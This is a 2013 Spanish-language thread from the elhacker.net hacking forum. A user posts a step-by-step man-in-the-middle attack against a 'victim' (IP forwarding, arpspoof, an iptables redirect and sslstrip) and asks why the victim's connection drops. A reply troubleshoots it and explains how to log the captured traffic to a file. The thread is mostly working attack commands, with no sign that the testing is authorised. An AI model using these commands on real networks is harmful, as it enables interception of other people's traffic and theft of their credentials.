Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: egiptoelcairo en 18 Abril 2013, 09:20 am



Título: Bactrack Sslstrip
Publicado por: egiptoelcairo en 18 Abril 2013, 09:20 am
Hola,
Bunes dias amigos, tengo un problema con el backtrack y el sslstrip, soy incapaz de ejecutarlo, miren les comento lo que me pasa

1) ejecuto este comando echo "1" > /proc/sys/net/ipv4/ip_forward
2) arpspoof -i {interfaz_red} -t {ip_victima} {ip_router}
3)iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
4)python sslstrip.py -l 10000

El problema que surge es que el internet de la victima se me corta es decir le ago un ddos, si utilizo otro puerto como por ejemplo el 8080 el internet de la victima funciona perfectamente pero el sslstrip, no muestra nada, tambien he probado a ejecutar despues el ettercap hacer un sniffing pero nada se corta la conexion de la victima. haber si alguien sabe algo gracias


Título: Re: Bactrack Sslstrip
Publicado por: revil8 en 19 Abril 2013, 03:15 am
Lo único raro que veo es el comando con el que ejecutas el sslstrip. Hace un tiempo que no lo uso pero siempre me había funcionado bien. Lo raro es que no le pones la ruta del archivo donde guarda la información que pilla. Instalaste el sslstrip?

Intenta esto a ver si te sirve:

Como pones que usas Backtrack, el sslstrip lo trae por defecto, pero hay que instalarlo. Vete a la ruta donde esta el sslstrip y veras un .py y un readme. Abre el readme y leetelo por encima que veras que te dice el comando para instalarlo. Será algo así como Python NOMBRE.py INSTALL o algo así.

Vuelve a hacer los 3 primeros comandos igual y cuando ya vayas a usar el sslstrip. Inicialo así:

sslstrip -w loquequieras.txt

para ir mirando el archivo mientras sigue guardando cosas puedes usar tail -f loquequieras.txt

Suerte!